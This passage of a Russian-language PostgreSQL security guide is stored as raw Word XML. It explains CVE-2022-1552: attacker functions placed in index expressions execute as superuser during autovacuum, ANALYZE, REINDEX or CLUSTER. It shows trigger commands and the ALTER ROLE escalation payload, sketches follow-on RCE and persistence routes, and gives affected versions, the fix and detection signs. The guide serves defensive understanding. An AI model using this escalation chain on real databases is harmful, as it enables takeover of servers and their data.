    <w:p w14:paraId="2C2FBBCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- или REINDEX TABLE tenant_X.reports_q4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44BE01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- или CLUSTER tenant_X.reports_q4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A02FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Index-expression вычисляется для каждой строки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>До фикса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil(val)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется в контексте autovacuum (superuser). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE postgres_attacker SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> срабатывает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42913020" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>После фикса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (14.3+/13.7+/...) — index-expressions выполняются в SRO-sandbox, который блокирует функции-ловушки, принадлежащие не-owner таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0067A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> При успешной эксплуатации — роль атакующего получает SUPERUSER, доступны все векторы 3.7 (COPY PROGRAM, untrusted languages), полный доступ к данным БД, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, persistence через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / event-triggers. Окно эксплуатации — время до следующего ANALYZE/autovacuum (минуты для активных таблиц, часы для редких).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513561C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернатива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> может сразу запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.7.1) для немедленного RCE, или установить trojan-функцию в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для persistence (см. 3.13.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4882E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL имеет concept of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>security restricted operations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SRO) — режим, в котором определённые SQL-операции (создание таблиц, изменение search_path, GRANT/REVOKE) запрещены. SRO применяется при выполнении кода в контексте, отличном от текущей сессии (например, в SECURITY DEFINER функциях или в admin-командах, работающих с user-owned объектами).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18F65F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">До CVE-2022-1552 SRO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не применялся</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к следующим командам, обрабатывающим index expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0740E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая авто-ANALYZE от autovacuum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760F2E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REINDEX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая REINDEX CONCURRENTLY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52B1FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CLUSTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882908C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFRESH MATERIALIZED VIEW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F024B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_amcheck</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (extension для проверки целостности индексов)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBCB8B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Когда superuser (или autovacuum) запускал эти команды, expressions исполнялись с full superuser-привилегиями, без проверки ownership функций. Это и был bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906846B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фикс — расширение SRO-sandbox на все перечисленные команды. Реализация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/commands/analyze.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/commands/cluster.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/commands/indexcmds.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. После фикса при попытке вызвать функцию другого owner-а из index expression в этих командах возникает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: function ... is not the owner of the table</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12CB19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0649D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 14.2, 13.6, 12.10, 11.15, 10.20. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Фикс:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14.3, 13.7, 12.11, 11.16, 10.21 (выпущены 12 мая 2022).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B62B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61170DB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CREATE на любой схеме, к которой обращается autovacuum (типично — schema принадлежит user-роли, в которой создаётся таблица)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C766D17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CREATE FUNCTION в собственной схеме (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7643E0FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B8815" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия жертвы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C404168" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   autovacuum работает как superuser (default; не настраивается)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819F9F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   либо admin вручную запускает ANALYZE/REINDEX/CLUSTER/REFRESH MATVIEW/pg_amcheck на таблице атакующего</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579741A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на plpgsql достаточно для эскалации без RCE; для прямого RCE — plperlu / plpython3u (см. 3.7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDD9F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>autovacuum = on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (default). При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>autovacuum = off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атака требует явного admin-triggering — менее автоматизированная, но всё ещё возможная.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EB037"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5C114D0E"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19B1AA0"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65954A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7C6E867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C5E988"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CB8E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-1552</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2F270E69"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28F8BE"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DB5A61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="745C62F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609D74"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50D4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12 мая 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0F3AD33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4CB043"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12C5CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 14.2, 13.6, 12.10, 11.15, 10.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="47BD573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C5B022"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02E94F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 14.3, 13.7, 12.11, 11.16, 10.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="69009BC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C69DF6"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A6B1D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SRO-sandbox bypass в обслуживающих командах с index expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5BD7D9E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642CA1"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10FD72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege escalation от CREATE-on-schema до superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02CF4472" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Function-based indexes — стандартный PostgreSQL-паттерн для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64816E80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   case-insensitive search: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ON users (lower(email))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54792155" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   JSONB indexing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ON events ((data-&gt;&gt;'event_type'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46009BE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   expression-based partial indexes для performance optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20691D6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   materialized view индексирование результатов агрегации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A766C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE044B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pP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для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с фильтром по index expression, ссылающемуся на функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не из</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> owner-schema таблицы. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_X.reports.idx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ссылается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_X.helper()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нормально; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_X.reports.idx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ссылается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — подозрительно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7A336" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_indexes.indexdef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\(\(\w+\.\w+\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (вызов функции из схемы) внутри expression — стоит ревьюить, особенно если functon owner != table owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFD3319" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функций, используемых в expression-индексах: статический сканер на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
